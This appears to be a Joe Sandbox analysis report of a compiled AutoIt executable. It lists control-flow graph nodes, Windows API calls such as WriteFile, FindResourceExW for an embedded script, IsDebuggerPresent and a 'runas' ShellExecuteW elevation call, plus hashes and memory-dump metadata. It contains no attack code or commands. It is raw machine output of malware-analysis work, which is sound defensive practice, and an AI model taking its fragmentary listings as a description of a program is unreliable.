95696 efde1a 95695->95696 95721 efdfb4 95696->95721 95699 ee6571 48 API calls 95707 efde2e 95699->95707 95701 f524c8 95703 efdea4 GetCurrentProcess 95734 efdf5f LoadLibraryA GetProcAddress 95703->95734 95705 efdee3 95728 efe00c 95705->95728 95706 efdf31 GetSystemInfo 95709 efdf0e 95706->95709 95707->95701 95725 efdf77 95707->95725 95708 efdebb 95708->95705 95708->95706 95712 efdf1c FreeLibrary 95709->95712 95713 efdf21 95709->95713 95712->95713 95713->95682 95714 efdf29 GetSystemInfo 95716 efdf03 95714->95716 95715 efdef9 95731 efdff4 95715->95731 95716->95709 95719 efdf09 FreeLibrary 95716->95719 95719->95709 95720->95689 95722 efdfbd 95721->95722 95723 eeb18b 48 API calls 95722->95723 95724 efde22 95723->95724 95724->95699 95735 efdf89 95725->95735 95739 efe01e 95728->95739 95732 efe00c 2 API calls 95731->95732 95733 efdf01 GetNativeSystemInfo 95732->95733 95733->95716 95734->95708 95736 efdea0 95735->95736 95737 efdf92 LoadLibraryA 95735->95737 95736->95703 95736->95708 95737->95736 95738 efdfa3 GetProcAddress 95737->95738 95738->95736 95740 efdef1 95739->95740 95741 efe027 LoadLibraryA 95739->95741 95740->95714 95740->95715 95741->95740 95742 efe038 GetProcAddress 95741->95742 95742->95740 95743 f519ba 95748 efc75a 95743->95748 95747 f519c9 95749 eed7f7 48 API calls 95748->95749 95750 efc7c8 95749->95750 95756 efd26c 95750->95756 95753 efc865 95754 efc881 95753->95754 95759 efd1fa 48 API calls ___crtGetEnvironmentStringsW 95753->95759 95755 f00f0a 52 API calls __cinit 95754->95755 95755->95747 95760 efd298 95756->95760 95759->95753 95761 efd28b 95760->95761 95762 efd2a5 95760->95762 95761->95753 95762->95761 95763 efd2ac RegOpenKeyExW 95762->95763 95763->95761 95764 efd2c6 RegQueryValueExW 95763->95764 95765 efd2fc RegCloseKey 95764->95765 95766 efd2e7 95764->95766 95765->95761 95766->95765

                                                                                        Executed Functions

                                                                                        Function 00F0B043 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 744 f0b043-f0b080 call f0f8a0 747 f0b082-f0b084 744->747 748 f0b089-f0b08b 744->748 751 f0b860-f0b86c call f0a70c 747->751 749 f0b0ac-f0b0d9 748->749 750 f0b08d-f0b0a7 call f07bda call f07c0e call f06e10 748->750 753 f0b0e0-f0b0e7 749->753 754 f0b0db-f0b0de 749->754 750->751 758 f0b105 753->758 759 f0b0e9-f0b100 call f07bda call f07c0e call f06e10 753->759 754->753 757 f0b10b-f0b110 754->757 762 f0b112-f0b11c call f0f82f 757->762 763 f0b11f-f0b12d call f13bf2 757->763 758->757 787 f0b851-f0b854 759->787 762->763 774 f0b133-f0b145 763->774 775 f0b44b-f0b45d 763->775 774->775 777 f0b14b-f0b183 call f07a0d GetConsoleMode 774->777 778 f0b463-f0b473 775->778 779 f0b7b8-f0b7d5 WriteFile 775->779 777->775 800 f0b189-f0b18f 777->800 785 f0b479-f0b484 778->785 786 f0b55a-f0b55f 778->786 782 f0b7e1-f0b7e7 GetLastError 779->782 783 f0b7d7-f0b7df 779->783 788 f0b7e9 782->788 783->788 792 f0b48a-f0b49a 785->792 793 f0b81b-f0b833 785->793 789 f0b663-f0b66e 786->789 790 f0b565-f0b56e 786->790 799 f0b85e-f0b85f 787->799 797 f0b7ef-f0b7f1 788->797 789->793 796 f0b674 789->796 790->793 798 f0b574 790->798 801 f0b4a0-f0b4a3 792->801 794 f0b835-f0b838 793->794 795 f0b83e-f0b84e call f07c0e call f07bda 793->795 794->795 804 f0b83a-f0b83c 794->804 795->787 805 f0b67e-f0b693 796->805 807 f0b7f3-f0b7f5 797->807 808 f0b856-f0b85c 797->808 809 f0b57e-f0b595 798->809 799->751 810 f0b191-f0b193 800->810 811 f0b199-f0b1bc GetConsoleCP 800->811 802 f0b4a5-f0b4be 801->802 803 f0b4e9-f0b520 WriteFile 801->803 814 f0b4c0-f0b4ca 802->814 815 f0b4cb-f0b4e7 802->815 803->782 816 f0b526-f0b538 803->816 804->799 817 f0b699-f0b69b 805->817 807->793 819 f0b7f7-f0b7fc 807->819 808->799 820 f0b59b-f0b59e 809->820 810->775 810->811 812 f0b440-f0b446 811->812 813 f0b1c2-f0b1ca 811->813 812->807 821 f0b1d4-f0b1d6 813->821 814->815 815->801 815->803 816->797 822 f0b53e-f0b54f 816->822 823 f0b6d8-f0b719 WideCharToMultiByte 817->823 824 f0b69d-f0b6b3 817->824 826 f0b812-f0b819 call f07bed 819->826 827 f0b7fe-f0b810 call f07c0e call f07bda 819->827 828 f0b5a0-f0b5b6 820->828 829 f0b5de-f0b627 WriteFile 820->829 832 f0b36b-f0b36e 821->832 833 f0b1dc-f0b1fe 821->833 822->792 834 f0b555 822->834 823->782 838 f0b71f-f0b721 823->838 835 f0b6b5-f0b6c4 824->835 836 f0b6c7-f0b6d6 824->836 826->787 827->787 840 f0b5b8-f0b5ca 828->840 841 f0b5cd-f0b5dc 828->841 829->782 831 f0b62d-f0b645 829->831 831->797 843 f0b64b-f0b658 831->843 846 f0b370-f0b373 832->846 847 f0b375-f0b3a2 832->847 844 f0b200-f0b215 833->844 845 f0b217-f0b223 call f01688 833->845 834->797 835->836 836->817 836->823 848 f0b727-f0b75a WriteFile 838->848 840->841 841->820 841->829 843->809 850 f0b65e 843->850 851 f0b271-f0b283 call f140f7 844->851 865 f0b225-f0b239 845->865 866 f0b269-f0b26b 845->866 846->847 853 f0b3a8-f0b3ab 846->853 847->853 854 f0b77a-f0b78e GetLastError 848->854 855 f0b75c-f0b776 848->855 850->797 870 f0b435-f0b43b 851->870 871 f0b289 851->871 859 f0b3b2-f0b3c5 call f15884 853->859 860 f0b3ad-f0b3b0 853->860 857 f0b794-f0b796 854->857 855->848 862 f0b778 855->862 857->788 864 f0b798-f0b7b0 857->864 859->782 877 f0b3cb-f0b3d5 859->877 860->859 867 f0b407-f0b40a 860->867 862->857 864->805 872 f0b7b6 864->872 874 f0b412-f0b42d 865->874 875 f0b23f-f0b254 call f140f7 865->875 866->851 867->821 873 f0b410 867->873 870->788 878 f0b28f-f0b2c4 WideCharToMultiByte 871->878 872->797 873->870 874->870 875->870 886 f0b25a-f0b267 875->886 880 f0b3d7-f0b3ee call f15884 877->880 881 f0b3fb-f0b401 877->881 878->870 882 f0b2ca-f0b2f0 WriteFile 878->882 880->782 889 f0b3f4-f0b3f5 880->889 881->867 882->782 885 f0b2f6-f0b30e 882->885 885->870 888 f0b314-f0b31b 885->888 886->878 888->881 890 f0b321-f0b34c WriteFile 888->890 889->881 890->782 891 f0b352-f0b359 890->891 891->870 892 f0b35f-f0b366 891->892 892->881
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 22bc6ac2c0cc63219f5b042fac733a7dffda688f5ba0da2b46cb52292a1ac086
                                                                                        • Instruction ID: f58832af7211c82a2f48e3d23775b65ed924b92b8e065018ff911c40a717fa2e
                                                                                        • Opcode Fuzzy Hash: 22bc6ac2c0cc63219f5b042fac733a7dffda688f5ba0da2b46cb52292a1ac086
                                                                                        • Instruction Fuzzy Hash: C7325A75F022288BDB24CF14DC81AE9B7B5FB4A310F5841D9E40AE7A91D7349E81EF52
                                                                                        Function 00EE3D19 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00EE3AA3,?), ref: 00EE3D45
                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,00EE3AA3,?), ref: 00EE3D57
                                                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,00FA1148,00FA1130,?,?,?,?,00EE3AA3,?), ref: 00EE3DC8
                                                                                          • Part of subcall function 00EE6430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00EE3DEE,00FA1148,?,?,?,?,?,00EE3AA3,?), ref: 00EE6471
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,00EE3AA3,?), ref: 00EE3E48
                                                                                        • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00F928F4,00000010), ref: 00F51CCE
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,00FA1148,?,?,?,?,?,00EE3AA3,?), ref: 00F51D06
                                                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00F7DAB4,00FA1148,?,?,?,?,?,00EE3AA3,?), ref: 00F51D89
                                                                                        • ShellExecuteW.SHELL32(00000000,?,?,?,?,00EE3AA3), ref: 00F51D90
                                                                                          • Part of subcall function 00EE3E6E: GetSysColorBrush.USER32(0000000F), ref: 00EE3E79
                                                                                          • Part of subcall function 00EE3E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00EE3E88
                                                                                          • Part of subcall function 00EE3E6E: LoadIconW.USER32(00000063), ref: 00EE3E9E
                                                                                          • Part of subcall function 00EE3E6E: LoadIconW.USER32(000000A4), ref: 00EE3EB0
                                                                                          • Part of subcall function 00EE3E6E: LoadIconW.USER32(000000A2), ref: 00EE3EC2
                                                                                          • Part of subcall function 00EE3E6E: RegisterClassExW.USER32(?), ref: 00EE3F30
                                                                                          • Part of subcall function 00EE36B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00EE36E6
                                                                                          • Part of subcall function 00EE36B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00EE3707
                                                                                          • Part of subcall function 00EE36B8: ShowWindow.USER32(00000000,?,?,?,?,00EE3AA3,?), ref: 00EE371B
                                                                                          • Part of subcall function 00EE36B8: ShowWindow.USER32(00000000,?,?,?,?,00EE3AA3,?), ref: 00EE3724
                                                                                          • Part of subcall function 00EE4FFC: _memset.LIBCMT ref: 00EE5022
                                                                                          • Part of subcall function 00EE4FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00EE50CB
                                                                                        Strings
                                                                                        • runas, xrefs: 00F51D84
                                                                                        • This is a third-party compiled AutoIt script., xrefs: 00F51CC8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                        • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                        • API String ID: 438480954-3287110873
                                                                                        • Opcode ID: c6185bbe7cbd4760648fd3ba3fe75bd83ccc902ea863146c665748bda687d8c5
                                                                                        • Instruction ID: 9a3540e3f9863e0771355bf3d3ddbd63e109349b48f8be90c907cf6c303b6146
                                                                                        • Opcode Fuzzy Hash: c6185bbe7cbd4760648fd3ba3fe75bd83ccc902ea863146c665748bda687d8c5
                                                                                        • Instruction Fuzzy Hash: 8B512771E043CCAACF11ABB6DC46EED7BB9BF16744F005065F612731A2DA704609EB22
                                                                                        Function 00EFDDC0 Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1079 efddc0-efde4f call eed7f7 GetVersionExW call ee6a63 call efdfb4 call ee6571 1088 efde55-efde56 1079->1088 1089 f524c8-f524cb 1079->1089 1090 efde58-efde63 1088->1090 1091 efde92-efdea2 call efdf77 1088->1091 1092 f524e4-f524e8 1089->1092 1093 f524cd 1089->1093 1097 efde69-efde6b 1090->1097 1098 f5244e-f52454 1090->1098 1110 efdec7-efdee1 1091->1110 1111 efdea4-efdec1 GetCurrentProcess call efdf5f 1091->1111 1095 f524d3-f524dc 1092->1095 1096 f524ea-f524f3 1092->1096 1094 f524d0 1093->1094 1094->1095 1095->1092 1096->1094 1102 f524f5-f524f8 1096->1102 1103 f52469-f52475 1097->1103 1104 efde71-efde74 1097->1104 1100 f52456-f52459 1098->1100 1101 f5245e-f52464 1098->1101 1100->1091 1101->1091 1102->1095 1106 f52477-f5247a 1103->1106 1107 f5247f-f52485 1103->1107 1108 f52495-f52498 1104->1108 1109 efde7a-efde89 1104->1109 1106->1091 1107->1091 1108->1091 1115 f5249e-f524b3 1108->1115 1116 efde8f 1109->1116 1117 f5248a-f52490 1109->1117 1113 efdee3-efdef7 call efe00c 1110->1113 1114 efdf31-efdf3b GetSystemInfo 1110->1114 1111->1110 1130 efdec3 1111->1130 1127 efdf29-efdf2f GetSystemInfo 1113->1127 1128 efdef9-efdf01 call efdff4 GetNativeSystemInfo 1113->1128 1119 efdf0e-efdf1a 1114->1119 1121 f524b5-f524b8 1115->1121 1122 f524bd-f524c3 1115->1122 1116->1091 1117->1091 1124 efdf1c-efdf1f FreeLibrary 1119->1124 1125 efdf21-efdf26 1119->1125 1121->1091 1122->1091 1124->1125 1129 efdf03-efdf07 1127->1129 1128->1129 1129->1119 1133 efdf09-efdf0c FreeLibrary 1129->1133 1130->1110 1133->1119
                                                                                        APIs
                                                                                        • GetVersionExW.KERNEL32(?), ref: 00EFDDEC
                                                                                        • GetCurrentProcess.KERNEL32(00000000,00F7DC38,?,?), ref: 00EFDEAC
                                                                                        • GetNativeSystemInfo.KERNELBASE(?,00F7DC38,?,?), ref: 00EFDF01
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 00EFDF0C
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 00EFDF1F
                                                                                        • GetSystemInfo.KERNEL32(?,00F7DC38,?,?), ref: 00EFDF29
                                                                                        • GetSystemInfo.KERNEL32(?,00F7DC38,?,?), ref: 00EFDF35
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                                        • String ID:
                                                                                        • API String ID: 3851250370-0
                                                                                        • Opcode ID: 4bf5325195a9eac8a6bd06c18600772513619ba781592a2cff3efdce168eff53
                                                                                        • Instruction ID: 4ceb13ada371ffa6fcf8998a86ff332addec2a84b7959a8630242419d1c638f8
                                                                                        • Opcode Fuzzy Hash: 4bf5325195a9eac8a6bd06c18600772513619ba781592a2cff3efdce168eff53
                                                                                        • Instruction Fuzzy Hash: 1761B2B2D0A388CFCF15CF6898C15E97FB56F2A300B1989D9D945AF207D624C909CB66
                                                                                        Function 00EE406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1151 ee406b-ee4083 CreateStreamOnHGlobal 1152 ee4085-ee409c FindResourceExW 1151->1152 1153 ee40a3-ee40a6 1151->1153 1154 f54f16-f54f25 LoadResource 1152->1154 1155 ee40a2 1152->1155 1154->1155 1156 f54f2b-f54f39 SizeofResource 1154->1156 1155->1153 1156->1155 1157 f54f3f-f54f4a LockResource 1156->1157 1157->1155 1158 f54f50-f54f6e 1157->1158 1158->1155
                                                                                        APIs
                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00EE449E,?,?,00000000,00000001), ref: 00EE407B
                                                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00EE449E,?,?,00000000,00000001), ref: 00EE4092
                                                                                        • LoadResource.KERNEL32(?,00000000,?,?,00EE449E,?,?,00000000,00000001,?,?,?,?,?,?,00EE41FB), ref: 00F54F1A
                                                                                        • SizeofResource.KERNEL32(?,00000000,?,?,00EE449E,?,?,00000000,00000001,?,?,?,?,?,?,00EE41FB), ref: 00F54F2F
                                                                                        • LockResource.KERNEL32(00EE449E,?,?,00EE449E,?,?,00000000,00000001,?,?,?,?,?,?,00EE41FB,00000000), ref: 00F54F42
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                        • String ID: SCRIPT
                                                                                        • API String ID: 3051347437-3967369404
                                                                                        • Opcode ID: fecdf640339b8cab91730b832e87e953c835676823302e8c528cc6e1a478cf66
                                                                                        • Instruction ID: 7957ed0b285bd99704ecbda98fa3a3145c3e6decf19833842b8c46a5511f480d
                                                                                        • Opcode Fuzzy Hash: fecdf640339b8cab91730b832e87e953c835676823302e8c528cc6e1a478cf66
                                                                                        • Instruction Fuzzy Hash: 4B117CB0600749BFE7218B66EC48F677BB9EBC5B55F10416CF612962A0DBB1DC00AA21
                                                                                        Function 00F26CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNELBASE(?,00F52F49), ref: 00F26CB9
                                                                                        • FindFirstFileW.KERNELBASE(?,?), ref: 00F26CCA
                                                                                        • FindClose.KERNEL32(00000000), ref: 00F26CDA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFind$AttributesCloseFirst
                                                                                        • String ID:
                                                                                        • API String ID: 48322524-0
                                                                                        • Opcode ID: 680579207d127cf7b257bc71e969e5fe71cc5d48520f68e08236d64d545ab4d3
                                                                                        • Instruction ID: b77594fcf737330be236a11b7fa53697272a61119adbb24ac590f3a21ad84284
                                                                                        • Opcode Fuzzy Hash: 680579207d127cf7b257bc71e969e5fe71cc5d48520f68e08236d64d545ab4d3
                                                                                        • Instruction Fuzzy Hash: 18E0D831D104245792107738FC0D4E937ACDB0A33AF100705F471C21D0E7F0D90065D5
                                                                                        Function 00EF3200 Relevance: 1.0, Instructions: 986COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper
                                                                                        • String ID:
                                                                                        • API String ID: 3964851224-0
                                                                                        • Opcode ID: 79d132894facf0b726fd7dd1cb897ffaa741cebbbdda5a44cb5135c7b2dc9f29
                                                                                        • Instruction ID: 62857bc7b884a62da4031f390d5e9d78f5960aaefbea8781617a4e5f5b3f1811
                                                                                        • Opcode Fuzzy Hash: 79d132894facf0b726fd7dd1cb897ffaa741cebbbdda5a44cb5135c7b2dc9f29
                                                                                        • Instruction Fuzzy Hash: 7D929C70608345CFD724DF28C490B6AB7E1BF88308F14985DEA9A9B3A2D771ED45CB52
                                                                                        Function 00EEE8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EEE959
                                                                                        • timeGetTime.WINMM ref: 00EEEBFA
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EEED2E
                                                                                        • TranslateMessage.USER32(?), ref: 00EEED3F
                                                                                        • DispatchMessageW.USER32(?), ref: 00EEED4A
                                                                                        • LockWindowUpdate.USER32(00000000), ref: 00EEED79
                                                                                        • DestroyWindow.USER32 ref: 00EEED85
                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EEED9F
                                                                                        • Sleep.KERNEL32(0000000A), ref: 00F55270
                                                                                        • TranslateMessage.USER32(?), ref: 00F559F7
                                                                                        • DispatchMessageW.USER32(?), ref: 00F55A05
                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F55A19
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                        • API String ID: 2641332412-570651680
                                                                                        • Opcode ID: f8efd413b279cbb11d2b88b6ecea69706782fb96353525cfba3935c3e9272776
                                                                                        • Instruction ID: e4ccb7606845379196feda3308fdd905cbd2ed80983546b5021ecb489fe286ca
                                                                                        • Opcode Fuzzy Hash: f8efd413b279cbb11d2b88b6ecea69706782fb96353525cfba3935c3e9272776
                                                                                        • Instruction Fuzzy Hash: FA620470604388CFDB20DF25C895BAA77E4BF44704F14187DFA4AAB292DBB5D848DB52
                                                                                        Function 00F15C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___createFile.LIBCMT ref: 00F15EC3
                                                                                        • ___createFile.LIBCMT ref: 00F15F04
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00F15F2D
                                                                                        • __dosmaperr.LIBCMT ref: 00F15F34
                                                                                        • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00F15F47
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00F15F6A
                                                                                        • __dosmaperr.LIBCMT ref: 00F15F73
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00F15F7C
                                                                                        • __set_osfhnd.LIBCMT ref: 00F15FAC
                                                                                        • __lseeki64_nolock.LIBCMT ref: 00F16016
                                                                                        • __close_nolock.LIBCMT ref: 00F1603C
                                                                                        • __chsize_nolock.LIBCMT ref: 00F1606C
                                                                                        • __lseeki64_nolock.LIBCMT ref: 00F1607E
                                                                                        • __lseeki64_nolock.LIBCMT ref: 00F16176
                                                                                        • __lseeki64_nolock.LIBCMT ref: 00F1618B
                                                                                        • __close_nolock.LIBCMT ref: 00F161EB
                                                                                          • Part of subcall function 00F0EA9C: CloseHandle.KERNELBASE(00000000,00F8EEF4,00000000,?,00F16041,00F8EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00F0EAEC
                                                                                          • Part of subcall function 00F0EA9C: GetLastError.KERNEL32(?,00F16041,00F8EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00F0EAF6
                                                                                          • Part of subcall function 00F0EA9C: __free_osfhnd.LIBCMT ref: 00F0EB03
                                                                                          • Part of subcall function 00F0EA9C: __dosmaperr.LIBCMT ref: 00F0EB25
                                                                                          • Part of subcall function 00F07C0E: __getptd_noexit.LIBCMT ref: 00F07C0E
                                                                                        • __lseeki64_nolock.LIBCMT ref: 00F1620D
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00F16342
                                                                                        • ___createFile.LIBCMT ref: 00F16361
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00F1636E
                                                                                        • __dosmaperr.LIBCMT ref: 00F16375
                                                                                        • __free_osfhnd.LIBCMT ref: 00F16395
                                                                                        • __invoke_watson.LIBCMT ref: 00F163C3
                                                                                        • __wsopen_helper.LIBCMT ref: 00F163DD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
